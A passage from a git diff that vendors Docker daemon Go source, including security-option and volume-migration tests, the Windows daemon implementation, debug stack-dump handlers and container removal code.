nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.AppArmorProfile != "test_profile" { + t.Fatalf("Unexpected AppArmorProfile, expected: \"test_profile\", got %q", container.AppArmorProfile) + } + + // test seccomp + sp := "/path/to/seccomp_test.json" + config.SecurityOpt = []string{"seccomp=" + sp} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.SeccompProfile != sp { + t.Fatalf("Unexpected AppArmorProfile, expected: %q, got %q", sp, container.SeccompProfile) + } + + // test valid label + config.SecurityOpt = []string{"label=user:USER"} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + + // test invalid label + config.SecurityOpt = []string{"label"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } + + // test invalid opt + config.SecurityOpt = []string{"test"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } +} + +func TestParseSecurityOpt(t *testing.T) { + container := &container.Container{} + config := &containertypes.HostConfig{} + + // test apparmor + config.SecurityOpt = []string{"apparmor=test_profile"} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.AppArmorProfile != "test_profile" { + t.Fatalf("Unexpected AppArmorProfile, expected: \"test_profile\", got %q", container.AppArmorProfile) + } + + // test seccomp + sp := "/path/to/seccomp_test.json" + config.SecurityOpt = []string{"seccomp=" + sp} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.SeccompProfile != sp { + t.Fatalf("Unexpected SeccompProfile, expected: %q, got %q", sp, container.SeccompProfile) + } + + // test valid label + config.SecurityOpt = []string{"label=user:USER"} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + + // test invalid label + config.SecurityOpt = []string{"label"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } + + // test invalid opt + config.SecurityOpt = []string{"test"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } +} + +func TestNetworkOptions(t *testing.T) { + daemon := &Daemon{} + dconfigCorrect := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "consul://localhost:8500", + ClusterAdvertise: "192.168.0.1:8000", + }, + } + + if _, err := daemon.networkOptions(dconfigCorrect, nil, nil); err != nil { + t.Fatalf("Expect networkOptions success, got error: %v", err) + } + + dconfigWrong := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "consul://localhost:8500://test://bbb", + }, + } + + if _, err := daemon.networkOptions(dconfigWrong, nil, nil); err == nil { + t.Fatalf("Expected networkOptions error, got nil") + } +} + +func TestMigratePre17Volumes(t *testing.T) { + rootDir, err := ioutil.TempDir("", "test-daemon-volumes") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + volumeRoot := filepath.Join(rootDir, "volumes") + err = os.MkdirAll(volumeRoot, 0755) + if err != nil { + t.Fatal(err) + } + + containerRoot := filepath.Join(rootDir, "containers") + cid := "1234" + err = os.MkdirAll(filepath.Join(containerRoot, cid), 0755) + + vid := "5678" + vfsPath := filepath.Join(rootDir, "vfs", "dir", vid) + err = os.MkdirAll(vfsPath, 0755) + if err != nil { + t.Fatal(err) + } + + config := []byte(` + { + "ID": "` + cid + `", + "Volumes": { + "/foo": "` + vfsPath + `", + "/bar": "/foo", + "/quux": "/quux" + }, + "VolumesRW": { + "/foo": true, + "/bar": true, + "/quux": false + } + } + `) + + volStore, err := store.New(volumeRoot) + if err != nil { + t.Fatal(err) + } + drv, err := local.New(volumeRoot, 0, 0) + if err != nil { + t.Fatal(err) + } + volumedrivers.Register(drv, volume.DefaultDriverName) + + daemon := &Daemon{root: rootDir, repository: containerRoot, volumes: volStore} + err = ioutil.WriteFile(filepath.Join(containerRoot, cid, "config.v2.json"), config, 600) + if err != nil { + t.Fatal(err) + } + c, err := daemon.load(cid) + if err != nil { + t.Fatal(err) + } + if err := daemon.verifyVolumesInfo(c); err != nil { + t.Fatal(err) + } + + expected := map[string]volume.MountPoint{ + "/foo": {Destination: "/foo", RW: true, Name: vid}, + "/bar": {Source: "/foo", Destination: "/bar", RW: true}, + "/quux": {Source: "/quux", Destination: "/quux", RW: false}, + } + for id, mp := range c.MountPoints { + x, exists := expected[id] + if !exists { + t.Fatal("volume not migrated") + } + if mp.Source != x.Source || mp.Destination != x.Destination || mp.RW != x.RW || mp.Name != x.Name { + t.Fatalf("got unexpected mountpoint, expected: %+v, got: %+v", x, mp) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go new file mode 100644 index 0000000000..cb1acf63d6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go @@ -0,0 +1,5 @@ +// +build !linux,!freebsd,!windows,!solaris + +package daemon + +const platformSupported = false diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows.go b/vendor/github.com/docker/docker/daemon/daemon_windows.go new file mode 100644 index 0000000000..51ad68b357 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_windows.go @@ -0,0 +1,604 @@ +package daemon + +import ( + "fmt" + "os" + "strings" + + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/platform" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libnetwork/datastore" + winlibnetwork "github.com/docker/libnetwork/drivers/windows" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" + blkiodev "github.com/opencontainers/runc/libcontainer/configs" + "golang.org/x/sys/windows" +) + +const ( + defaultNetworkSpace = "172.16.0.0/12" + platformSupported = true + windowsMinCPUShares = 1 + windowsMaxCPUShares = 10000 + windowsMinCPUPercent = 1 + windowsMaxCPUPercent = 100 + windowsMinCPUCount = 1 +) + +func getBlkioWeightDevices(config *containertypes.HostConfig) ([]blkiodev.WeightDevice, error) { + return nil, nil +} + +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + return nil +} + +func getBlkioReadIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func getBlkioWriteIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func getBlkioReadBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func getBlkioWriteBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func (daemon *Daemon) getLayerInit() func(string) error { + return nil +} + +func checkKernel() error { + return nil +} + +func (daemon *Daemon) getCgroupDriver() string { + return "" +} + +// adaptContainerSettings is called during container creation to modify any +// settings necessary in the HostConfig structure. +func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error { + if hostConfig == nil { + return nil + } + + return nil +} + +func verifyContainerResources(resources *containertypes.Resources, isHyperv bool) ([]string, error) { + warnings := []string{} + + if !isHyperv { + // The processor resource controls are mutually exclusive on + // Windows Server Containers, the order of precedence is + // CPUCount first, then CPUShares, and CPUPercent last. + if resources.CPUCount > 0 { + if resources.CPUShares > 0 { + warnings = append(warnings, "Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded") + logrus.Warn("Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded") + resources.CPUShares = 0 + } + if resources.CPUPercent > 0 { + warnings = append(warnings, "Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + logrus.Warn("Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + resources.CPUPercent = 0 + } + } else if resources.CPUShares > 0 { + if resources.CPUPercent > 0 { + warnings = append(warnings, "Conflicting options: CPU shares takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + logrus.Warn("Conflicting options: CPU shares takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + resources.CPUPercent = 0 + } + } + } + + if resources.CPUShares < 0 || resources.CPUShares > windowsMaxCPUShares { + return warnings, fmt.Errorf("range of CPUShares is from %d to %d", windowsMinCPUShares, windowsMaxCPUShares) + } + if resources.CPUPercent < 0 || resources.CPUPercent > windowsMaxCPUPercent { + return warnings, fmt.Errorf("range of CPUPercent is from %d to %d", windowsMinCPUPercent, windowsMaxCPUPercent) + } + if resources.CPUCount < 0 { + return warnings, fmt.Errorf("invalid CPUCount: CPUCount cannot be negative") + } + + if resources.NanoCPUs > 0 && resources.CPUPercent > 0 { + return warnings, fmt.Errorf("conflicting options: Nano CPUs and CPU Percent cannot both be set") + } + if resources.NanoCPUs > 0 && resources.CPUShares > 0 { + return warnings, fmt.Errorf("conflicting options: Nano CPUs and CPU Shares cannot both be set") + } + // The precision we could get is 0.01, because on Windows we have to convert to CPUPercent. + // We don't set the lower limit here and it is up to the underlying platform (e.g., Windows) to return an error. + if resources.NanoCPUs < 0 || resources.NanoCPUs > int64(sysinfo.NumCPU())*1e9 { + return warnings, fmt.Errorf("range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU()) + } + + if len(resources.BlkioDeviceReadBps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadBps") + } + if len(resources.BlkioDeviceReadIOps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadIOps") + } + if len(resources.BlkioDeviceWriteBps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceWriteBps") + } + if len(resources.BlkioDeviceWriteIOps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceWriteIOps") + } + if resources.BlkioWeight > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioWeight") + } + if len(resources.BlkioWeightDevice) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioWeightDevice") + } + if resources.CgroupParent != "" { + return warnings, fmt.Errorf("invalid option: Windows does not support CgroupParent") + } + if resources.CPUPeriod != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support CPUPeriod") + } + if resources.CpusetCpus != "" { + return warnings, fmt.Errorf("invalid option: Windows does not support CpusetCpus") + } + if resources.CpusetMems != "" { + return warnings, fmt.Errorf("invalid option: Windows does not support CpusetMems") + } + if resources.KernelMemory != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support KernelMemory") + } + if resources.MemoryReservation != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support MemoryReservation") + } + if resources.MemorySwap != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwap") + } + if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 { + return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwappiness") + } + if resources.OomKillDisable != nil && *resources.OomKillDisable { + return warnings, fmt.Errorf("invalid option: Windows does not support OomKillDisable") + } + if resources.PidsLimit != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support PidsLimit") + } + if len(resources.Ulimits) != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support Ulimits") + } + return warnings, nil +} + +// verifyPlatformContainerSettings performs platform-specific validation of the +// hostconfig and config structures. +func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { + warnings := []string{} + + hyperv := daemon.runAsHyperVContainer(hostConfig) + if !hyperv && system.IsWindowsClient() { + // @engine maintainers. This block should not be removed. It partially enforces licensing + // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. + return warnings, fmt.Errorf("Windows client operating systems only support Hyper-V containers") + } + + w, err := verifyContainerResources(&hostConfig.Resources, hyperv) + warnings = append(warnings, w...) + if err != nil { + return warnings, err + } + return warnings, nil +} + +// platformReload update configuration with platform specific options +func (daemon *Daemon) platformReload(config *Config) map[string]string { + return map[string]string{} +} + +// verifyDaemonSettings performs validation of daemon config struct +func verifyDaemonSettings(config *Config) error { + return nil +} + +// checkSystem validates platform-specific requirements +func checkSystem() error { + // Validate the OS version. Note that docker.exe must be manifested for this + // call to return the correct version. + osv := system.GetOSVersion() + if osv.MajorVersion < 10 { + return fmt.Errorf("This version of Windows does not support the docker daemon") + } + if osv.Build < 14393 { + return fmt.Errorf("The docker daemon requires build 14393 or later of Windows Server 2016 or Windows 10") + } + + vmcompute := windows.NewLazySystemDLL("vmcompute.dll") + if vmcompute.Load() != nil { + return fmt.Errorf("Failed to load vmcompute.dll. Ensure that the Containers role is installed.") + } + return nil +} + +// configureKernelSecuritySupport configures and validate security support for the kernel +func configureKernelSecuritySupport(config *Config, driverName string) error { + return nil +} + +// configureMaxThreads sets the Go runtime max threads threshold +func configureMaxThreads(config *Config) error { + return nil +} + +func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { + netOptions, err := daemon.networkOptions(config, nil, nil) + if err != nil { + return nil, err + } + controller, err := libnetwork.New(netOptions...) + if err != nil { + return nil, fmt.Errorf("error obtaining controller instance: %v", err) + } + + hnsresponse, err := hcsshim.HNSListNetworkRequest("GET", "", "") + if err != nil { + return nil, err + } + + // Remove networks not present in HNS + for _, v := range controller.Networks() { + options := v.Info().DriverOptions() + hnsid := options[winlibnetwork.HNSID] + found := false + + for _, v := range hnsresponse { + if v.Id == hnsid { + found = true + break + } + } + + if !found { + // global networks should not be deleted by local HNS + if v.Info().Scope() != datastore.GlobalScope { + err = v.Delete() + if err != nil { + logrus.Errorf("Error occurred when removing network %v", err) + } + } + } + } + + _, err = controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)) + if err != nil { + return nil, err + } + + defaultNetworkExists := false + + if network, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil { + options := network.Info().DriverOptions() + for _, v := range hnsresponse { + if options[winlibnetwork.HNSID] == v.Id { + defaultNetworkExists = true + break + } + } + } + + // discover and add HNS networks to windows + // network that exist are removed and added again + for _, v := range hnsresponse { + var n libnetwork.Network + s := func(current libnetwork.Network) bool { + options := current.Info().DriverOptions() + if options[winlibnetwork.HNSID] == v.Id { + n = current + return true + } + return false + } + + controller.WalkNetworks(s) + if n != nil { + // global networks should not be deleted by local HNS + if n.Info().Scope() == datastore.GlobalScope { + continue + } + v.Name = n.Name() + // This will not cause network delete from HNS as the network + // is not yet populated in the libnetwork windows driver + n.Delete() + } + + netOption := map[string]string{ + winlibnetwork.NetworkName: v.Name, + winlibnetwork.HNSID: v.Id, + } + + v4Conf := []*libnetwork.IpamConf{} + for _, subnet := range v.Subnets { + ipamV4Conf := libnetwork.IpamConf{} + ipamV4Conf.PreferredPool = subnet.AddressPrefix + ipamV4Conf.Gateway = subnet.GatewayAddress + v4Conf = append(v4Conf, &ipamV4Conf) + } + + name := v.Name + + // If there is no nat network create one from the first NAT network + // encountered + if !defaultNetworkExists && runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) { + name = runconfig.DefaultDaemonNetworkMode().NetworkName() + defaultNetworkExists = true + } + + v6Conf := []*libnetwork.IpamConf{} + _, err := controller.NewNetwork(strings.ToLower(v.Type), name, "", + libnetwork.NetworkOptionGeneric(options.Generic{ + netlabel.GenericData: netOption, + }), + libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), + ) + + if err != nil { + logrus.Errorf("Error occurred when creating network %v", err) + } + } + + if !config.DisableBridge { + // Initialize default driver "bridge" + if err := initBridgeDriver(controller, config); err != nil { + return nil, err + } + } + + return controller, nil +} + +func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { + if _, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil { + return nil + } + + netOption := map[string]string{ + winlibnetwork.NetworkName: runconfig.DefaultDaemonNetworkMode().NetworkName(), + } + + var ipamOption libnetwork.NetworkOption + var subnetPrefix string + + if config.bridgeConfig.FixedCIDR != "" { + subnetPrefix = config.bridgeConfig.FixedCIDR + } else { + // TP5 doesn't support properly detecting subnet + osv := system.GetOSVersion() + if osv.Build < 14360 { + subnetPrefix = defaultNetworkSpace + } + } + + if subnetPrefix != "" { + ipamV4Conf := libnetwork.IpamConf{} + ipamV4Conf.PreferredPool = subnetPrefix + v4Conf := []*libnetwork.IpamConf{&ipamV4Conf} + v6Conf := []*libnetwork.IpamConf{} + ipamOption = libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil) + } + + _, err := controller.NewNetwork(string(runconfig.DefaultDaemonNetworkMode()), runconfig.DefaultDaemonNetworkMode().NetworkName(), "", + libnetwork.NetworkOptionGeneric(options.Generic{ + netlabel.GenericData: netOption, + }), + ipamOption, + ) + + if err != nil { + return fmt.Errorf("Error creating default network: %v", err) + } + + return nil +} + +// registerLinks sets up links between containers and writes the +// configuration out for persistence. As of Windows TP4, links are not supported. +func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { + return nil +} + +func (daemon *Daemon) cleanupMountsByID(in string) error { + return nil +} + +func (daemon *Daemon) cleanupMounts() error { + return nil +} + +func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { + return nil, nil, nil +} + +func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { + config.Root = rootDir + // Create the root directory if it doesn't exists + if err := system.MkdirAllWithACL(config.Root, 0); err != nil && !os.IsExist(err) { + return err + } + return nil +} + +// runasHyperVContainer returns true if we are going to run as a Hyper-V container +func (daemon *Daemon) runAsHyperVContainer(hostConfig *containertypes.HostConfig) bool { + if hostConfig.Isolation.IsDefault() { + // Container is set to use the default, so take the default from the daemon configuration + return daemon.defaultIsolation.IsHyperV() + } + + // Container is requesting an isolation mode. Honour it. + return hostConfig.Isolation.IsHyperV() + +} + +// conditionalMountOnStart is a platform specific helper function during the +// container start to call mount. +func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { + // We do not mount if a Hyper-V container + if !daemon.runAsHyperVContainer(container.HostConfig) { + return daemon.Mount(container) + } + return nil +} + +// conditionalUnmountOnCleanup is a platform specific helper function called +// during the cleanup of a container to unmount. +func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + // We do not unmount if a Hyper-V container + if !daemon.runAsHyperVContainer(container.HostConfig) { + return daemon.Unmount(container) + } + return nil +} + +func driverOptions(config *Config) []nwconfig.Option { + return []nwconfig.Option{} +} + +func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { + if !c.IsRunning() { + return nil, errNotRunning{c.ID} + } + + // Obtain the stats from HCS via libcontainerd + stats, err := daemon.containerd.Stats(c.ID) + if err != nil { + return nil, err + } + + // Start with an empty structure + s := &types.StatsJSON{} + + // Populate the CPU/processor statistics + s.CPUStats = types.CPUStats{ + CPUUsage: types.CPUUsage{ + TotalUsage: stats.Processor.TotalRuntime100ns, + UsageInKernelmode: stats.Processor.RuntimeKernel100ns, + UsageInUsermode: stats.Processor.RuntimeKernel100ns, + }, + } + + // Populate the memory statistics + s.MemoryStats = types.MemoryStats{ + Commit: stats.Memory.UsageCommitBytes, + CommitPeak: stats.Memory.UsageCommitPeakBytes, + PrivateWorkingSet: stats.Memory.UsagePrivateWorkingSetBytes, + } + + // Populate the storage statistics + s.StorageStats = types.StorageStats{ + ReadCountNormalized: stats.Storage.ReadCountNormalized, + ReadSizeBytes: stats.Storage.ReadSizeBytes, + WriteCountNormalized: stats.Storage.WriteCountNormalized, + WriteSizeBytes: stats.Storage.WriteSizeBytes, + } + + // Populate the network statistics + s.Networks = make(map[string]types.NetworkStats) + + for _, nstats := range stats.Network { + s.Networks[nstats.EndpointId] = types.NetworkStats{ + RxBytes: nstats.BytesReceived, + RxPackets: nstats.PacketsReceived, + RxDropped: nstats.DroppedPacketsIncoming, + TxBytes: nstats.BytesSent, + TxPackets: nstats.PacketsSent, + TxDropped: nstats.DroppedPacketsOutgoing, + } + } + + // Set the timestamp + s.Stats.Read = stats.Timestamp + s.Stats.NumProcs = platform.NumProcs() + + return s, nil +} + +// setDefaultIsolation determine the default isolation mode for the +// daemon to run in. This is only applicable on Windows +func (daemon *Daemon) setDefaultIsolation() error { + daemon.defaultIsolation = containertypes.Isolation("process") + // On client SKUs, default to Hyper-V + if system.IsWindowsClient() { + daemon.defaultIsolation = containertypes.Isolation("hyperv") + } + for _, option := range daemon.configStore.ExecOptions { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return err + } + key = strings.ToLower(key) + switch key { + + case "isolation": + if !containertypes.Isolation(val).IsValid() { + return fmt.Errorf("Invalid exec-opt value for 'isolation':'%s'", val) + } + if containertypes.Isolation(val).IsHyperV() { + daemon.defaultIsolation = containertypes.Isolation("hyperv") + } + if containertypes.Isolation(val).IsProcess() { + if system.IsWindowsClient() { + // @engine maintainers. This block should not be removed. It partially enforces licensing + // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. + return fmt.Errorf("Windows client operating systems only support Hyper-V containers") + } + daemon.defaultIsolation = containertypes.Isolation("process") + } + default: + return fmt.Errorf("Unrecognised exec-opt '%s'\n", key) + } + } + + logrus.Infof("Windows default isolation mode: %s", daemon.defaultIsolation) + return nil +} + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + var layers []string + for _, l := range rootfs.DiffIDs { + layers = append(layers, l.String()) + } + return types.RootFS{ + Type: rootfs.Type, + Layers: layers, + } +} + +func setupDaemonProcess(config *Config) error { + return nil +} + +// verifyVolumesInfo is a no-op on windows. +// This is called during daemon initialization to migrate volumes from pre-1.7. +// volumes were not supported on windows pre-1.7 +func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { + return nil +} + +func (daemon *Daemon) setupSeccompProfile() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap.go b/vendor/github.com/docker/docker/daemon/debugtrap.go new file mode 100644 index 0000000000..209048b589 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap.go @@ -0,0 +1,62 @@ +package daemon + +import ( + "fmt" + "os" + "path/filepath" + "strings" + "time" + + "github.com/davecgh/go-spew/spew" + "github.com/pkg/errors" +) + +const dataStructuresLogNameTemplate = "daemon-data-%s.log" + +// dumpDaemon appends the daemon datastructures into file in dir and returns full path +// to that file. +func (d *Daemon) dumpDaemon(dir string) (string, error) { + // Ensure we recover from a panic as we are doing this without any locking + defer func() { + recover() + }() + + path := filepath.Join(dir, fmt.Sprintf(dataStructuresLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1))) + f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666) + if err != nil { + return "", errors.Wrap(err, "failed to open file to write the daemon datastructure dump") + } + defer f.Close() + + dump := struct { + containers interface{} + names interface{} + links interface{} + execs interface{} + volumes interface{} + images interface{} + layers interface{} + imageReferences interface{} + downloads interface{} + uploads interface{} + registry interface{} + plugins interface{} + }{ + containers: d.containers, + execs: d.execCommands, + volumes: d.volumes, + images: d.imageStore, + layers: d.layerStore, + imageReferences: d.referenceStore, + downloads: d.downloadManager, + uploads: d.uploadManager, + registry: d.RegistryService, + plugins: d.PluginStore, + names: d.nameIndex, + links: d.linkIndex, + } + + spew.Fdump(f, dump) // Does not return an error + f.Sync() + return path, nil +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go new file mode 100644 index 0000000000..d650eb7f8c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go @@ -0,0 +1,33 @@ +// +build !windows + +package daemon + +import ( + "os" + "os/signal" + "syscall" + + "github.com/Sirupsen/logrus" + stackdump "github.com/docker/docker/pkg/signal" +) + +func (d *Daemon) setupDumpStackTrap(root string) { + c := make(chan os.Signal, 1) + signal.Notify(c, syscall.SIGUSR1) + go func() { + for range c { + path, err := stackdump.DumpStacks(root) + if err != nil { + logrus.WithError(err).Error("failed to write goroutines dump") + } else { + logrus.Infof("goroutine stacks written to %s", path) + } + path, err = d.dumpDaemon(root) + if err != nil { + logrus.WithError(err).Error("failed to write daemon datastructure dump") + } else { + logrus.Infof("daemon datastructure dump written to %s", path) + } + } + }() +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go new file mode 100644 index 0000000000..f5b9170907 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux,!darwin,!freebsd,!windows,!solaris + +package daemon + +func (d *Daemon) setupDumpStackTrap(_ string) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go new file mode 100644 index 0000000000..fb20c9d2c5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go @@ -0,0 +1,52 @@ +package daemon + +import ( + "fmt" + "os" + "syscall" + "unsafe" + + winio "github.com/Microsoft/go-winio" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/system" +) + +func (d *Daemon) setupDumpStackTrap(root string) { + // Windows does not support signals like *nix systems. So instead of + // trapping on SIGUSR1 to dump stacks, we wait on a Win32 event to be + // signaled. ACL'd to builtin administrators and local system + ev := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid()) + sd, err := winio.SddlToSecurityDescriptor("D:P(A;;GA;;;BA)(A;;GA;;;SY)") + if err != nil { + logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", ev, err.Error()) + return + } + var sa syscall.SecurityAttributes + sa.Length = uint32(unsafe.Sizeof(sa)) + sa.InheritHandle = 1 + sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) + h, err := system.CreateEvent(&sa, false, false, ev) + if h == 0 || err != nil { + logrus.Errorf("failed to create debug stackdump event %s: %s", ev, err.Error()) + return + } + go func() { + logrus.Debugf("Stackdump - waiting signal at %s", ev) + for { + syscall.WaitForSingleObject(h, syscall.INFINITE) + path, err := signal.DumpStacks(root) + if err != nil { + logrus.WithError(err).Error("failed to write goroutines dump") + } else { + logrus.Infof("goroutine stacks written to %s", path) + } + path, err = d.dumpDaemon(root) + if err != nil { + logrus.WithError(err).Error("failed to write daemon datastructure dump") + } else { + logrus.Infof("daemon datastructure dump written to %s", path) + } + } + }() +} diff --git a/vendor/github.com/docker/docker/daemon/delete.go b/vendor/github.com/docker/docker/daemon/delete.go new file mode 100644 index 0000000000..6b622bde37 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/delete.go @@ -0,0 +1,168 @@ +package daemon + +import ( + "fmt" + "os" + "path" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/layer" + volumestore "github.com/docker/docker/volume/store" +) + +// ContainerRm removes the container id from the filesystem. An error +// is returned if the container is not found, or if the remove +// fails. If the remove succeeds, the container name is released, and +// network links are removed. +func (daemon *Daemon) ContainerRm(name string, config *types.ContainerRmConfig) error { + start := time.Now() + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + // Container state RemovalInProgress should be used to avoid races. + if inProgress := container.SetRemovalInProgress(); inProgress { + err := fmt.Errorf("removal of container %s is already in progress", name) + return errors.NewBadRequestError(err) + } + defer container.ResetRemovalInProgress() + + // check if container wasn't deregistered by previous rm since Get + if c := daemon.containers.Get(container.ID); c == nil { + return nil + } + + if config.RemoveLink { + return daemon.rmLink(container, name) + } + + err = daemon.cleanupContainer(container, config.ForceRemove, config.RemoveVolume) + containerActions.WithValues("delete").UpdateSince(start) + + return err +} + +func (daemon *Daemon) rmLink(container *container.Container, name string) error { + if name[0] != '/' { + name = "/" + name + } + parent, n := path.Split(name) + if parent == "/" { + return fmt.Errorf("Conflict, cannot remove the default name of the container") + } + + parent = strings.TrimSuffix(parent, "/") + pe, err := daemon.nameIndex.Get(parent) + if err != nil { + return fmt.Errorf("Cannot get parent %s for name %s", parent, name) + } + + daemon.releaseName(name) + parentContainer, _ := daemon.GetContainer(pe) + if parentContainer != nil { + daemon.linkIndex.unlink(name, container, parentContainer) + if err := daemon.updateNetwork(parentContainer); err != nil { + logrus.Debugf("Could not update network to remove link %s: %v", n, err) + } + } + return nil +} + +// cleanupContainer unregisters a container from the daemon, stops stats +// collection and cleanly removes contents and metadata from the filesystem. +func (daemon *Daemon) cleanupContainer(container *container.Container, forceRemove, removeVolume bool) (err error) { + if container.IsRunning() { + if !forceRemove { + err := fmt.Errorf("You cannot remove a running container %s. Stop the container before attempting removal or use -f", container.ID) + return errors.NewRequestConflictError(err) + } + if err := daemon.Kill(container); err != nil { + return fmt.Errorf("Could not kill running container %s, cannot remove - %v", container.ID, err) + } + } + + // stop collection of stats for the container regardless + // if stats are currently getting collected. + daemon.statsCollector.stopCollection(container) + + if err = daemon.containerStop(container, 3); err != nil { + return err + } + + // Mark container dead. We don't want anybody to be restarting it. + container.SetDead() + + // Save container state to disk. So that if error happens before + // container meta file got removed from disk, then a restart of + // docker should not make a dead container alive. + if err := container.ToDiskLocking(); err != nil && 